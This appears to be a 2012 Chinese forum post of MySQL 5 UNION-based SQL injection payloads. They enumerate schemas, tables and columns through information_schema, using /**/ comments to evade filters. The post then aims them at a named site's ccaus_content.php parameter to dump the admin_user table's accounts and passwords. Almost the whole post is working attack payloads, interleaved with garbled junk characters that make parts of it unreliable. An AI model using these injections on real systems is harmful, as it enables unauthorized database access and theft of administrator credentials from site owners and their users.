查库7 [9 Y. {* Q$ U5 l
N' b. [$ s3 ?8 z+ @# Rid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*! ]$ d% R; H/ Q5 y
; f! N5 n8 `0 j* _& v9 g1 R查表+ d' T" {/ Q T8 D; T. I
% V3 \4 c7 `( w$ ~id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1 U/ f% v) s/ z! ~9 u0 i: x$ w: D
% i6 K7 I/ T& o4 N; U) N1 |0 Q
查段/ x% o: f5 I3 s
: v; r# b! A9 E! w! `
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
+ A0 f' }$ c4 q6 j0 o. N2 _/ O9 L! \% d
& s+ B8 y8 X+ x" X4 K1 w1 Qmysql5高级注入方法暴表5 ^4 D' j* u* K& G& N$ M* |
. D2 V) O+ c3 ]/ r! R. `例子如下:5 W4 l- p& G a3 R6 `2 J
' [7 r3 O0 v8 C
1.爆表6 S' _2 U4 u A1 H- M6 O8 c
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
& E6 J$ f5 `; @6 |" n$ g这样爆到第4个时出现了admin_user表。
/ v4 M# y! l6 e) P* s& Q# i+ g$ _: m' m. K3 o! @
2.暴字段
% _1 B6 i; m l+ Xhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
; J) G: r/ m" D- d5 j
+ _1 p) m8 R: ]1 q" I7 S
v; y( V, V, [1 Q: V7 F) j8 j3.爆密码7 m2 `! i' B# H; `% d2 M7 R
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* 2 J: h9 v! c) b, W' k8 w+ v
$ M( N2 v; @* g) N2 W; [! j# t5 U- i
|
发表于 2012-9-13 16:29:37
收藏
支持
反对